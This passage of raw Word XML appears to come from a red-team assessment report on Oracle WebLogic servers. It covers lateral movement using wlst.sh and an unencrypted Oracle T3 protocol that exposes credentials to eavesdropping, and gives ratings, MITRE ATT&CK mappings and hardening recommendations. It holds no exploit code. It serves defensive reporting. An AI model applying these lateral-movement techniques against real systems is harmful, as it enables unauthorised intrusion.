      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 5/8/2025 4:38 PM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F39EC2D" w14:textId="64BBA143" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="00034F2B" w:rsidP="002B3751">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0D267916" wp14:editId="503091B1">
            <wp:extent cx="3925509" cy="4429125"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2837126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12629" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3930429" cy="4434676"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C26778E" w14:textId="2CD9BEE4" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="187" w:name="_Toc213253800"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Access remote WebLogic configuration using wlst.sh.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="187"/>
    </w:p>
    <w:p w14:paraId="0AC54A25" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="188" w:name="_Hlk207966359"/>
      <w:r w:rsidRPr="001019D3">
        <w:t>Screen clipping taken: 5/8/2025 4:38 PM</w:t>
      </w:r>
      <w:bookmarkEnd w:id="188"/>
    </w:p>
    <w:p w14:paraId="2B620506" w14:textId="3209B470" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="006E0236">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t>ocally available development/management utilities</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> such as wlst.sh </w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t>can be used to launch attacks on other hosts within the environment. It should be noted that removing development utilities will not prevent motivated attackers</w:t>
      </w:r>
      <w:r w:rsidR="006E0236" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">simply copy </w:t>
      </w:r>
      <w:r w:rsidR="006E0236" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00560205" w:rsidRPr="001019D3">
        <w:t>development utilities to the target host. However, removing development utilities is recommended as part of a defence in depth approach and to deter opportunistic attackers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553C8E62" w14:textId="2E2669C8" w:rsidR="009D38DD" w:rsidRPr="001019D3" w:rsidRDefault="009D38DD" w:rsidP="009D38DD">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The list of servers </w:t>
      </w:r>
      <w:r w:rsidR="00A41ABF" w:rsidRPr="001019D3">
        <w:t>where the script was found</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> can be found in annex</w:t>
      </w:r>
      <w:r w:rsidR="00A41ABF" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A41ABF" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00A41ABF" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212827921 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00A41ABF" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>5.2.4</w:t>
      </w:r>
      <w:r w:rsidR="00A41ABF" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30733058" w14:textId="3F37C678" w:rsidR="00526786" w:rsidRPr="001019D3" w:rsidRDefault="00526786" w:rsidP="00526786">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">The complete list of affected Oracle servers with Oracle T3 access can be found in annex </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213159498 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>5.2.5</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6786C1" w14:textId="77777777" w:rsidR="00560205" w:rsidRPr="001019D3" w:rsidRDefault="00560205" w:rsidP="0026176B">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111B5133" w14:textId="7E5A0A79" w:rsidR="006E0236" w:rsidRPr="001019D3" w:rsidRDefault="006E0236" w:rsidP="0026176B">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Restrict access to wlst.sh </w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">script on all WebLogic servers </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>to allow only high-privileged users to execute the script</w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396CDB3E" w14:textId="3228FE87" w:rsidR="006E0236" w:rsidRPr="001019D3" w:rsidRDefault="006E0236" w:rsidP="0026176B">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Consider removing wlst.sh completely from </w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">all WebLogic </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>system</w:t>
      </w:r>
      <w:r w:rsidR="009E5C13" w:rsidRPr="001019D3">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0026176B" w:rsidRPr="001019D3">
        <w:t>when not needed and</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> put it back only when it is.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FFAC953" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Restrict access to Oracle T3 exposed service on WebLogic servers to only authorized servers and applications through robust access controls and network segmentation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230A33B8" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Ensure secure configuration of Oracle T3 on all instances, using distinct passwords for each instance, disabling unauthenticated access and enforcing strong authentication mechanisms.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596EE705" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Inter-service communication, such as Oracle T3 should be monitored, so that all access attempts to middleware services are logged and monitored, with alerts configured for anomalous or unauthorized behaviour.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A93FA0" w14:textId="1445FB39" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:pStyle w:val="ListNumberLevel2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">See </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213093207 \r \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.5</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> for recommendations about the unencrypted </w:t>
      </w:r>
      <w:r w:rsidR="0092561E" w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Oracle </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>T3 protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163528CA" w14:textId="1F4AFBAA" w:rsidR="006E6B32" w:rsidRPr="001019D3" w:rsidRDefault="006E6B32">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="720B232F" w14:textId="44D073E9" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:pageBreakBefore/>
        <w:ind w:left="734" w:hanging="734"/>
      </w:pPr>
      <w:bookmarkStart w:id="189" w:name="_Ref213093207"/>
      <w:bookmarkStart w:id="190" w:name="_Toc212654661"/>
      <w:bookmarkStart w:id="191" w:name="_Ref213099244"/>
      <w:bookmarkStart w:id="192" w:name="_Toc213253571"/>
      <w:r w:rsidRPr="001019D3">
        <w:lastRenderedPageBreak/>
        <w:t>Unencrypted Oracle T3 protocol</w:t>
      </w:r>
      <w:bookmarkEnd w:id="189"/>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> allows for eavesdropping</w:t>
      </w:r>
      <w:bookmarkEnd w:id="192"/>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2321"/>
        <w:gridCol w:w="1841"/>
        <w:gridCol w:w="2987"/>
      </w:tblGrid>
      <w:tr w:rsidR="002B3751" w:rsidRPr="001019D3" w14:paraId="3CA17736" w14:textId="77777777" w:rsidTr="00747EBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="910" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3051BE02" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="00747EBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Rating</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1328" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4AF316FC" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="00747EBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Impacted assets</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2762" w:type="pct"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6AC5AD97" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="00747EBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>ATT&amp;CK MITRE</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002B3751" w:rsidRPr="001019D3" w14:paraId="49A7BA7E" w14:textId="77777777" w:rsidTr="00747EBF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="910" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1967281D" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="00747EBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1328" w:type="pct"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="257A9DAE" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="00747EBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>ETS WebLogic and Oracle DB servers</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1053" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="6BFFD814" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="00747EBF">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TA-0007</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="51115620" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="00747EBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Lateral movement</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1709" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="2121E1F8" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="00747EBF">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T1021</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BE6A07E" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="00747EBF">
            <w:pPr>
              <w:pStyle w:val="Tablecontent"/>
              <w:spacing w:before="60" w:after="60"/>
              <w:ind w:left="57" w:right="57"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rStyle w:val="MacroTextChar"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001019D3">
              <w:rPr>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Remote Services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="42AA60DF" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D531079" w14:textId="4C8AF3B1" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">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and performing local reconnaissance on the hosts (</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref212824973 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.3</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>), the Red Team gained access to high-privileged Oracle credentials that allowed using Oracle’s administrative protocol called T3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16ABB40C" w14:textId="4C761DDF" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">While this has already been discovered in the previous finding (see </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213159271 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>4.3.4</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>), it was identified that multiple Oracle servers exposed the unencrypted T3 protocol. The protocol require authentication but does not encrypt the connection. This means that an attacker who is able to intercept communications between the server and a user could discover the user’s authentication credentials and gain access to the service, as well as to any other services using the same credentials. It was noted that in some cases the T3s alternative was also present, however the fact that the unencrypted version of the protocol was not disabled exposed the environment to eavesdropping the credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5426EBC7" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74300CB4" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:spacing w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The following shows a successful connection using the unencrypted T3 protocol (</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>t3</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>://&lt;IP&gt;:&lt;Port&gt;).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7264464E" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="0" w:afterAutospacing="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37D8BB84" wp14:editId="109E778B">
            <wp:extent cx="5511800" cy="620389"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="529320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20750" name="Picture 529320750"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId36">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5531321" cy="622586"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BEA145A" w14:textId="01DFF888" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="193" w:name="_Toc213253801"/>
      <w:r w:rsidRPr="001019D3">
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> SEQ Figure \* ARABIC </w:instrText>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>16</w:t>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>: Unencrypted T3 connection.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="193"/>
    </w:p>
    <w:p w14:paraId="2E1B7778" w14:textId="3817430E" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:spacing w:before="120" w:after="120" w:afterAutospacing="0" w:line="264" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>The complete list of affected Oracle servers with only T3 (not T3s) can be found in annex</w:t>
      </w:r>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:instrText xml:space="preserve"> REF _Ref213159498 \r \h </w:instrText>
      </w:r>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00706DA2">
        <w:t>5.2.5</w:t>
      </w:r>
      <w:r w:rsidR="00526786" w:rsidRPr="001019D3">
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="001019D3">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC307F7" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="002B3751">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B15729C" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Enforce Oracle T3S (T3 over SSL) protocol on all Oracle servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10DAA976" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:spacing w:after="120" w:afterAutospacing="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001019D3">
        <w:t>Disable unencrypted Oracle T3 protocol support on all Oracle servers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FA3BEBA" w14:textId="77777777" w:rsidR="002B3751" w:rsidRPr="001019D3" w:rsidRDefault="002B3751" w:rsidP="0037306A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
